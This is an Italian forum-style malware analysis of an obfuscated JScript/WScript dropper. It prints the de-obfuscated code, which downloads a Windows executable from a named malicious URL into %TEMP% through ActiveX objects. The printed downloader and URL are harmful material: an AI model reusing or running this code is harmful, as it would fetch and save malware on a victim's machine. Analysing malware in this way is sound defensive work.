Come primo passo, esegui il codice tramite un dispositivo di bellezza JS nel codice per eseguire l'escape.
Nota, vedrai diversi pattern come:
Fake["hostkey" ["replace"](/hostkey/, "write")]
che all'interno delle parentesi è equivalente a "hostkey".replace(/hostkey/, "write")
che valuta solo "write"
o Fake.write
. Anche
La maggior parte dell'attività sembra essere nello script scritto concatenando un insieme di variabili (riga 124 del tuo file). Questi comandi, una volta de-offuscati un po 'sono:
var _ = 27570,
Keyword = "serious";
var multi_resize = 0;
var update_results = "characters_excluding_spaces",
looks = "search_errors",
postSelector = "f347";
Dakar = "targetParent", _actual_db_id = "deactivate_plugin", populates = 2;
e032 = "v_path_info", These = "ExpandEnvironmen";
wp_ajax_send_link_to_editor = "x00FF";
places = "tStrings", retries = "menuControl";
list = "http://dermosihhat.abdu", AuthorURI = 1,
propertychange = "llahaktay.com/image/";
fff8e5 = "flags/.../403.php?";
triplet = "already_has_default",
sanitize_option_ = "f=404";
textTopHei$ght = function() {
Keyword = update_results = looks = this;
Dakar = Keyword["WScript"];
_actual_db_id = Dakar["CreateObject"]("WScript.Shell");
};
textTopHei$ght();
e032 = _actual_db_id[These + places]("%TEMP%/") + "5w5xGKQ9WE.exe";
try {
this = "Reformat";
} catch (flush) {
retries = new update_results["ActiveXObject"]("Msxml2.XMLHTTP.6.0");
}
new_branch = function() {
retries.open("GET", "http://dermosihhat.abdullahaktay.com/image/flags/.../403.php?f=404", +multi_resize);
retries.send();
Dakar.Sleep(1000);
};
new_branch();
slidEvent = function() {
postSelector = new looks["ActiveXObject"]("ADODB.Stream"));
};
slidEvent();
postSelector.open();
postSelector.type = +AuthorURI;
wp_ajax_send_link_to_editor = postSelector;
wp_ajax_send_link_to_editor.write(retries["ResponseBody"]);
wp_ajax_send_link_to_editor.position = 0;
postSelector["saveToFile"](e032, +populates);
triplet = postSelector;
triplet["close"]();
Sembra che stia facendo un sacco di cose ActiveX (che non ho familiarità con) (WScript) oltre a fare una richiesta al seguente URL dannoso ( link ) che sembra essere un binario di Windows / DOS. (Inizia con byte MZ e il testo "Questo programma non può essere eseguito in modalità DOS" vicino all'avvio.) .
Quindi sembra che si stia utilizzando ActiveX per scaricare questo eseguibile e indurti a farlo funzionare, anche se non so cosa fa l'eseguibile. (Non sono un utente di Windows e non sono sicuro di tutti i dettagli di ActiveX.)